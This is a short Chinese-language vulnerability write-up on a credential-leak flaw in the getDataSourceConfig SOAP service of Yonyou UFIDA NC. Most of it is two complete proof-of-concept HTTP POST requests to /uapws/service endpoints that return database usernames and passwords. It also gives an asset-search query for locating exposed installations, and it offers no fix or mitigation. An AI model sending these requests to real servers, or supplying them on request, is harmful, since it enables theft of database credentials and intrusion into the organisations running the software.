用友UFIDA NC getDataSourceConfig存在信息泄露漏洞
一、漏洞简介
用友UFIDA NC getDataSourceConfig存在信息泄露漏洞,泄露数据库账号及密码等敏感信息。
二、影响版本
- 用友UFIDA NC
三、资产测绘
- hunter
app.name="用友 UFIDA NC" - 特征
四、漏洞复现
POC1
POST /uapws/service/nc.itf.ses.inittool.SESInitToolService HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=57CC01E2D28AFE5F2A476BFF030D601A.ncServer; JSESSIONID=95BB77917927DCB24E2A01BDD1AB6CC1.ncServer
Upgrade-Insecure-Requests: 1
SOAPAction: urn:getDataSourceConfig
Content-Type: text/xml;charset=UTF-8
Host: xx.xx.xx.xx
Content-Length: 245
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ses="http://inittool.ses.itf.nc/SESInitToolService">
<soapenv:Header/>
<soapenv:Body>
<ses:getDataSourceConfig/>
</soapenv:Body>
</soapenv:Envelope>
POC2
POST /uapws/service/nc.itf.ses.inittool.PortalSESInitToolService HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=A957970D435ACE12928741F2456B7644.ncServer; JSESSIONID=95BB77917927DCB24E2A01BDD1AB6CC1.ncServer
Upgrade-Insecure-Requests: 1
SOAPAction: urn:getDataSourceConfig
Content-Type: text/xml;charset=UTF-8
Host: xx.xx.xx.xx
Content-Length: 251
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:por="http://inittool.ses.itf.nc/PortalSESInitToolService">
<soapenv:Header/>
<soapenv:Body>
<por:getDataSourceConfig/>
</soapenv:Body>
</soapenv:Envelope>